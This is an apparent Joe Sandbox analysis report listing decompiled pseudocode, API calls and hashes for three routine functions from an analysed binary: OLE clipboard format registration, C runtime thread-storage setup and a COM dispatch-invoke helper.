                                                                                                                            Function 0041BE1D Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registryclipboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0041BE1D(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}




                                                                                                                            0x0041be2a
                                                                                                                            0x0041be33
                                                                                                                            0x0041be3c
                                                                                                                            0x0041be46
                                                                                                                            0x0041be50
                                                                                                                            0x0041be5a
                                                                                                                            0x0041be64
                                                                                                                            0x0041be6e
                                                                                                                            0x0041be78
                                                                                                                            0x0041be82
                                                                                                                            0x0041be8c
                                                                                                                            0x0041be96
                                                                                                                            0x0041be9b
                                                                                                                            0x0041bea2

                                                                                                                            APIs
                                                                                                                            • RegisterClipboardFormatA.USER32(Native), ref: 0041BE2C
                                                                                                                            • RegisterClipboardFormatA.USER32(OwnerLink), ref: 0041BE35
                                                                                                                            • RegisterClipboardFormatA.USER32(ObjectLink), ref: 0041BE3F
                                                                                                                            • RegisterClipboardFormatA.USER32(Embedded Object), ref: 0041BE49
                                                                                                                            • RegisterClipboardFormatA.USER32(Embed Source), ref: 0041BE53
                                                                                                                            • RegisterClipboardFormatA.USER32(Link Source), ref: 0041BE5D
                                                                                                                            • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 0041BE67
                                                                                                                            • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 0041BE71
                                                                                                                            • RegisterClipboardFormatA.USER32(FileName), ref: 0041BE7B
                                                                                                                            • RegisterClipboardFormatA.USER32(FileNameW), ref: 0041BE85
                                                                                                                            • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 0041BE8F
                                                                                                                            • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 0041BE99
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClipboardFormatRegister
                                                                                                                            • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                            • API String ID: 1228543026-2889995556
                                                                                                                            • Opcode ID: 10f241e00a28adbdd4f70a22d5c7423574e7515be74c089906f4e5137b3d959f
                                                                                                                            • Instruction ID: c52bd1bb33b5ebff093178e17fc259ef4583e79ca694f11f69f931059c5fcf39
                                                                                                                            • Opcode Fuzzy Hash: 10f241e00a28adbdd4f70a22d5c7423574e7515be74c089906f4e5137b3d959f
                                                                                                                            • Instruction Fuzzy Hash: 4D0139B0E40B84DACA30BF765C09A1BBAE0EEC8B207625D2BD0958B650D6B8D445CF48
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00422465 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E00422465(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				void* _t37;
				struct HINSTANCE__* _t38;
				void* _t41;
				void* _t43;

				_t37 = __edx;
				_t30 = __ebx;
				_t38 = GetModuleHandleA("KERNEL32.DLL");
				if(_t38 != 0) {
					 *0x444aac = GetProcAddress(_t38, "FlsAlloc");
					 *0x444ab0 = GetProcAddress(_t38, "FlsGetValue");
					 *0x444ab4 = GetProcAddress(_t38, "FlsSetValue");
					_t7 = GetProcAddress(_t38, "FlsFree");
					__eflags =  *0x444aac;
					_t41 = TlsSetValue;
					 *0x444ab8 = _t7;
					if( *0x444aac == 0) {
						L6:
						 *0x444ab0 = TlsGetValue;
						 *0x444aac = E00422185;
						 *0x444ab4 = _t41;
						 *0x444ab8 = TlsFree;
					} else {
						__eflags =  *0x444ab0;
						if( *0x444ab0 == 0) {
							goto L6;
						} else {
							__eflags =  *0x444ab4;
							if( *0x444ab4 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x4415c4 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x444ab0);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E0041E31F();
							 *0x444aac = E004220B6( *0x444aac);
							 *0x444ab0 = E004220B6( *0x444ab0);
							 *0x444ab4 = E004220B6( *0x444ab4);
							 *0x444ab8 = E004220B6( *0x444ab8);
							_t18 = E004228BD();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E004221B8(_t37);
								goto L15;
							} else {
								_push(E00422344);
								_t21 =  *((intOrPtr*)(E00422122( *0x444aac)))();
								__eflags = _t21 - 0xffffffff;
								 *0x4415c0 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E00422629(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										_push(_t43);
										_push( *0x4415c0);
										__eflags =  *((intOrPtr*)(E00422122( *0x444ab4)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											E004221F5(_t30, _t37, _t38, _t43, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E004221B8(_t37);
					return 0;
				}
			}

















                                                                                                                            0x00422465
                                                                                                                            0x00422465
                                                                                                                            0x00422471
                                                                                                                            0x00422475
                                                                                                                            0x00422495
                                                                                                                            0x004224a2
                                                                                                                            0x004224af
                                                                                                                            0x004224b4
                                                                                                                            0x004224b6
                                                                                                                            0x004224bd
                                                                                                                            0x004224c3
                                                                                                                            0x004224c8
                                                                                                                            0x004224e0
                                                                                                                            0x004224e5
                                                                                                                            0x004224ef
                                                                                                                            0x004224f9
                                                                                                                            0x004224ff
                                                                                                                            0x004224ca
                                                                                                                            0x004224ca
                                                                                                                            0x004224d1
                                                                                                                            0x00000000
                                                                                                                            0x004224d3
                                                                                                                            0x004224d3
                                                                                                                            0x004224da
                                                                                                                            0x00000000
                                                                                                                            0x004224dc
                                                                                                                            0x004224dc
                                                                                                                            0x004224de
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004224de
                                                                                                                            0x004224da
                                                                                                                            0x004224d1
                                                                                                                            0x00422504
                                                                                                                            0x0042250a
                                                                                                                            0x0042250d
                                                                                                                            0x00422512
                                                                                                                            0x004225e4
                                                                                                                            0x004225e4
                                                                                                                            0x004225e4
                                                                                                                            0x00422518
                                                                                                                            0x0042251f
                                                                                                                            0x00422521
                                                                                                                            0x00422523
                                                                                                                            0x00000000
                                                                                                                            0x00422529
                                                                                                                            0x00422529
                                                                                                                            0x0042253f
                                                                                                                            0x0042254f
                                                                                                                            0x0042255f
                                                                                                                            0x0042256c
                                                                                                                            0x00422571
                                                                                                                            0x00422576
                                                                                                                            0x00422578
                                                                                                                            0x004225df
                                                                                                                            0x004225df
                                                                                                                            0x00000000
                                                                                                                            0x0042257a
                                                                                                                            0x0042257a
                                                                                                                            0x0042258b
                                                                                                                            0x0042258d
                                                                                                                            0x00422590
                                                                                                                            0x00422595
                                                                                                                            0x00000000
                                                                                                                            0x00422597
                                                                                                                            0x004225a3
                                                                                                                            0x004225a5
                                                                                                                            0x004225a9
                                                                                                                            0x00000000
                                                                                                                            0x004225ab
                                                                                                                            0x004225ab
                                                                                                                            0x004225ac
                                                                                                                            0x004225c0
                                                                                                                            0x004225c2
                                                                                                                            0x00000000
                                                                                                                            0x004225c4
                                                                                                                            0x004225c4
                                                                                                                            0x004225c6
                                                                                                                            0x004225c7
                                                                                                                            0x004225ce
                                                                                                                            0x004225d4
                                                                                                                            0x004225d8
                                                                                                                            0x004225dc
                                                                                                                            0x004225dc
                                                                                                                            0x004225c2
                                                                                                                            0x004225a9
                                                                                                                            0x00422595
                                                                                                                            0x00422578
                                                                                                                            0x00422523
                                                                                                                            0x004225e8
                                                                                                                            0x00422477
                                                                                                                            0x00422477
                                                                                                                            0x0042247f
                                                                                                                            0x0042247f

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0041E4B8), ref: 0042246B
                                                                                                                            • __mtterm.LIBCMT ref: 00422477
                                                                                                                              • Part of subcall function 004221B8: __decode_pointer.LIBCMT ref: 004221C9
                                                                                                                              • Part of subcall function 004221B8: TlsFree.KERNEL32(00000020,004225E4), ref: 004221E3
                                                                                                                              • Part of subcall function 004221B8: DeleteCriticalSection.KERNEL32(00000000,00000000,76C865A0,00000001,004225E4), ref: 00422921
                                                                                                                              • Part of subcall function 004221B8: DeleteCriticalSection.KERNEL32(00000020,76C865A0,00000001,004225E4), ref: 0042294B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0042248D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042249A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004224A7
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004224B4
                                                                                                                            • TlsAlloc.KERNEL32 ref: 00422504
                                                                                                                            • TlsSetValue.KERNEL32(00000000), ref: 0042251F
                                                                                                                            • __init_pointers.LIBCMT ref: 00422529
                                                                                                                            • __encode_pointer.LIBCMT ref: 00422534
                                                                                                                            • __encode_pointer.LIBCMT ref: 00422544
                                                                                                                            • __encode_pointer.LIBCMT ref: 00422554
                                                                                                                            • __encode_pointer.LIBCMT ref: 00422564
                                                                                                                            • __decode_pointer.LIBCMT ref: 00422585
                                                                                                                            • __calloc_crt.LIBCMT ref: 0042259E
                                                                                                                            • __decode_pointer.LIBCMT ref: 004225B8
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004225CE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                            • API String ID: 4287529916-3819984048
                                                                                                                            • Opcode ID: cafba45211d0e8bffd32a6f56689f7a3cc17f51d9e25267f5ade47b9bfe5d5ec
                                                                                                                            • Instruction ID: b2950120eb87b0212b8d318ecfc428db635ebd68d80ffb60b7a5c21ed2a03df5
                                                                                                                            • Opcode Fuzzy Hash: cafba45211d0e8bffd32a6f56689f7a3cc17f51d9e25267f5ade47b9bfe5d5ec
                                                                                                                            • Instruction Fuzzy Hash: 97319735A44361BADB21AF75BE057163AE0AB86359B50453FF610E26F1DFBC8480CB1D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041B83D Relevance: 28.9, APIs: 19, Instructions: 423stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 46%
                                                                                                                            			E0041B83D(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				signed int _t194;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				signed int _t291;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E0041E981(E00432083, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E0041EA59(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E0041EC90(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x435818;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 = _t194 - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if(_t194 == _t257) {
					L37:
					_t295 = 0;
					E0041A21A(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E0041EC90(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					_t289 = _t300 - 0x54;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x437aec, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E0041B7E6(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E0040254C(_t257, _t289, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E0041A92D(_t300 - 0x68, _t289);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E0040254C(_t257, _t289, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M0041BDCD))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E00419ADB(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E0040DAAF(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E00402521(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E0041B08D(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								E0040DD11(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								E0040DD11(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								E0040DD11(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E00420866(_t300 + 0x14, 0x43cb90);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t291 = _t194 * _t290 >> 0x20;
					_t297 = E00402521(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E0041EC90(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M0041BD81))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E0041A5A5(_t300 - 0x34, _t299, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E0041A9C7(_t300 - 0x68, _t291, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E0040254C(_t258, _t291, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M0041BD31))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E0040DE71(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E00402C55(__ecx, __edx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E0040D87C(__ecx);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}

































                                                                                                                            0x0041b83d
                                                                                                                            0x0041b844
                                                                                                                            0x0041b849
                                                                                                                            0x0041b84c
                                                                                                                            0x0041b850
                                                                                                                            0x0041bd29
                                                                                                                            0x0041bd2e
                                                                                                                            0x0041bd2e
                                                                                                                            0x0041b856
                                                                                                                            0x0041b859
                                                                                                                            0x0041b85c
                                                                                                                            0x0041b85f
                                                                                                                            0x0041b869
                                                                                                                            0x0041b86c
                                                                                                                            0x0041b871
                                                                                                                            0x0041b877
                                                                                                                            0x0041b882
                                                                                                                            0x0041b882
                                                                                                                            0x0041b889
                                                                                                                            0x0041b890
                                                                                                                            0x0041b895
                                                                                                                            0x0041b89c
                                                                                                                            0x0041b89c
                                                                                                                            0x0041b89f
                                                                                                                            0x0041b8a6
                                                                                                                            0x0041b8a9
                                                                                                                            0x0041b8ac
                                                                                                                            0x0041b8af
                                                                                                                            0x0041b8b2
                                                                                                                            0x0041b8b5
                                                                                                                            0x0041b8b9
                                                                                                                            0x0041b8bd
                                                                                                                            0x0041b8be
                                                                                                                            0x0041bade
                                                                                                                            0x0041bae2
                                                                                                                            0x0041bae4
                                                                                                                            0x0041baed
                                                                                                                            0x0041baef
